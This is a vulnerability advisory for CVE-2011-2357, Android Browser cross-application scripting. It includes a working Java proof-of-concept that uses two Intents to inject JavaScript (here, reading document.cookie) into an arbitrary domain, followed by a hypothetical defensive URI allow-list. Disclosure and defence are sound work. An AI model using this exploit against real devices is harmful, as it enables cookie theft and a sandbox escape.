ALEPH-2011000.md
| Field | Value |
|---|---|
| layout | vuln |
| credit | roeeh, yair |
| timeline | type: add, date: 2017-03-01; type: release, date: 2011-07-31 |
| alephid | ALEPH-2011000 |
| cve | CVE-2011-2357 |
| date | 2011-07-31 |
| title | Android Browser Cross-Application Scripting |
| severity | high |
| product | Android 2.3.4 and below |
| mitigation | Install Android 2.3.5 or 3.2. |
| references | |

By generating a malicious Intent that targets Android's Browser, malware may exploit the Browser's URL loading process to inject JavaScript code into an arbitrary domain, thus breaking Android's sandboxing.

Proof-of-Concept

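```java
import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class CasExploit extends Activity
{
    static final String mPackage = "com.android.browser";
    static final String mClass = "BrowserActivity";
    static final String mUrl = "http://target.domain/";
    static final String mJavascript = "alert(document.cookie)";
    static final int mSleep = 15000;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        // First Intent: have the Browser load the target domain.
        startBrowserActivity(mUrl);

        // Wait for the page to finish loading.
        try {
            Thread.sleep(mSleep);
        } catch (InterruptedException e) {}

        // Second Intent: a javascript: URI, handled in the context of the loaded page.
        startBrowserActivity("javascript:" + mJavascript);
    }

    // Sends an explicit VIEW Intent carrying the given URL to the Browser's activity.
    private void startBrowserActivity(String url) {
        Intent res = new Intent("android.intent.action.VIEW");
        res.setComponent(new ComponentName(mPackage, mPackage + "." + mClass));
        res.setData(Uri.parse(url));
        startActivity(res);
    }
}
```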
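
The same class of bug applies to any activity that passes an Intent-supplied URL to a WebView. One way to guard the receiving side, added here as an example: it is not code from the advisory or the Android Browser and not the fix shipped in 2.3.5. The names `SafeViewerActivity` and `isLoadableFromIntent` are hypothetical.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebView;

import java.util.Locale;

// Hypothetical activity (not Android Browser source) that renders URLs
// received through VIEW intents in a WebView.
public class SafeViewerActivity extends Activity {
    private WebView mWebView;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        setContentView(mWebView);
        loadFromIntent(getIntent());
    }

    // Delivered when an intent reaches an already-running instance
    // (singleTop/singleTask launch modes), i.e. while a page is loaded.
    @Override
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        setIntent(intent);
        loadFromIntent(intent);
    }

    private void loadFromIntent(Intent intent) {
        Uri uri = (intent == null) ? null : intent.getData();
        if (isLoadableFromIntent(uri)) {
            mWebView.loadUrl(uri.toString());
        }
        // Anything else is dropped; the page already loaded stays untouched.
    }

    // Allow-list by scheme. Opaque URIs such as javascript:... have no host
    // and are rejected, as are file:, content: and data: URIs.
    static boolean isLoadableFromIntent(Uri uri) {
        if (uri == null || uri.getScheme() == null || uri.getHost() == null) {
            return false;
        }
        String scheme = uri.getScheme().toLowerCase(Locale.ROOT);
        return scheme.equals("http") || scheme.equals("https");
    }
}
```

The check runs on both entry points because `WebView.loadUrl()` executes a `javascript:` URL in the context of whatever page is currently displayed.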